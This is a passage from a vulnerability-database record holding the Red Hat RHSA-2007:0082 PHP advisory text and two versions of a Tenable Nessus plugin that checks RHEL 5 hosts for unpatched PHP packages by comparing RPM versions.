value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2007:0082\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-soap-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xml-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-xmlrpc-5.1.6-7.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-bcmath / php-cli / php-common / php-dba / php-devel / etc\");\n }\n}\n", "title": "RHEL 5 : php (RHSA-2007:0082)", "type": "nessus", "viewCount": 4}, "differentElements": ["description"], "edition": 8, "lastseen": "2019-01-03T10:04:55"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2007-1701", "CVE-2007-0907", "CVE-2007-1285", "CVE-2007-0909", "CVE-2007-1825", "CVE-2007-0910", "CVE-2007-0988", "CVE-2007-1380", "CVE-2007-0906", "CVE-2007-0908"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated PHP packages that fix several security issues are now available for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session extension; the str_replace() function; and the imap_mail_compose() function. If very long strings were passed to the str_replace() function, an integer overflow could occur in memory allocation. If a script used the imap_mail_compose() function to create a new MIME message based on an input body from an untrusted source, it could result in a heap overflow. An attacker with access to a PHP application affected by any these issues could trigger the flaws and possibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the zend_hash_init() function could be forced into an infinite loop, consuming CPU resources for a limited time, until the script timeout alarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted source, certain WDDX input packets could expose a random portion of heap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a database, and the database table contents were under an attacker's control, a format string vulnerability was possible which could allow arbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header() function in a script. However it is unlikely that this would have any effect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain super-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial of service attack by submitting an input variable with a deeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain backported patches to correct these issues.", "edition": 1, "hash": "2069e646e44d8d9060b9605e8b44a7685dabd27427df633b719c194fa3526f66", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "141eb5e5e7f7efcaf70f35531014315a", "key": "pluginID"}, {"hash": "aff19e7d2f5800fbf65dc3d944df032a", "key": "cvss"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "5ed89809cd59db22c6c4bc5e691596fe", "key": "cvelist"}, {"hash": "2ab893896877901f3ca480db3bed6e02", "key": "references"}, {"hash": "ddc199dc1dacc50b088328ca4eddaf1b", "key": "published"}, {"hash": "62f280b4def9da5a16add3c46760d1f8", "key": "sourceData"}, {"hash": "800084d14669b7e75c4baba9f7a47966", "key": "modified"}, {"hash": "c986b43752781caa839decc2a0741192", "key": "title"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "4b44f6da67fcb87f1db557fc9f19e20c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}, {"hash": "2e53e2231fd68fdc02c53c3b32b818ad", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=25317", "id": "REDHAT-RHSA-2007-0082.NASL", "lastseen": "2016-09-26T17:23:09", "modified": "2015-03-19T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "25317", "published": "2007-05-25T00:00:00", "references": ["https://www.redhat.com/security/data/cve/CVE-2007-0907.html", "https://www.redhat.com/security/data/cve/CVE-2007-1825.html", "https://www.redhat.com/security/data/cve/CVE-2007-0910.html", "https://www.redhat.com/security/data/cve/CVE-2007-0988.html", "https://www.redhat.com/security/data/cve/CVE-2007-1380.html", "https://www.redhat.com/security/data/cve/CVE-2007-0906.html", "https://www.redhat.com/security/data/cve/CVE-2007-0908.html", "https://www.redhat.com/security/data/cve/CVE-2007-1285.html", "https://www.redhat.com/security/data/cve/CVE-2007-1701.html", "https://www.redhat.com/security/data/cve/CVE-2007-0909.html", "http://rhn.redhat.com/errata/RHSA-2007-0082.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2007:0082. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(25317);\n script_version (\"$Revision: 1.17 $\");\n script_cvs_date(\"$Date: 2015/03/19 15:03:52 $\");\n\n script_cve_id(\"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2007-1285\", \"CVE-2007-1380\", \"CVE-2007-1701\", \"CVE-2007-1825\");\n script_bugtraq_id(22496, 22764);\n script_xref(name:\"RHSA\", value:\"2007:0082\");\n\n script_name(english:\"RHEL 5 : php (RHSA-2007:0082)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated PHP packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA number of buffer overflow flaws were found in the PHP session\nextension; the str_replace() function; and the imap_mail_compose()\nfunction. If very long strings were passed to the str_replace()\nfunction, an integer overflow could occur in memory allocation. If a\nscript used the imap_mail_compose() function to create a new MIME\nmessage based on an input body from an untrusted source, it could\nresult in a heap overflow. An attacker with access to a PHP\napplication affected by any these issues could trigger the flaws and\npossibly execute arbitrary code as the 'apache' user. (CVE-2007-0906)\n\nWhen unserializing untrusted data on 64-bit platforms, the\nzend_hash_init() function could be forced into an infinite loop,\nconsuming CPU resources for a limited time, until the script timeout\nalarm aborted execution of the script. (CVE-2007-0988)\n\nIf the wddx extension was used to import WDDX data from an untrusted\nsource, certain WDDX input packets could expose a random portion of\nheap memory. (CVE-2007-0908)\n\nIf the odbc_result_all() function was used to display data from a\ndatabase, and the database table contents were under an attacker's\ncontrol, a format string vulnerability was possible which could allow\narbitrary code execution. (CVE-2007-0909)\n\nA one byte memory read always occurs before the beginning of a buffer.\nThis could be triggered, for example, by any use of the header()\nfunction in a script. However it is unlikely that this would have any\neffect. (CVE-2007-0907)\n\nSeveral flaws in PHP could allow attackers to 'clobber' certain\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\n\nAn input validation bug allowed a remote attacker to trigger a denial\nof service attack by submitting an input variable with a\ndeeply-nested-array. (CVE-2007-1285)\n\nUsers of PHP should upgrade to these updated packages which contain\nbackported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0906.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0907.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0908.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0909.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0910.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-0988.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1285.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1380.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1701.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1825.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2007-0082.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2007/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2007/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2007-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-bcmath-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-cli-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-common-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-common-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-common-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-dba-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-devel-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-gd-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-imap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ldap-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mbstring-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-mysql-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-ncurses-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-odbc-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pdo-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"php-pgsql-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"php-snmp-5.1.6-7.el5\")) flag++;\nif (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", 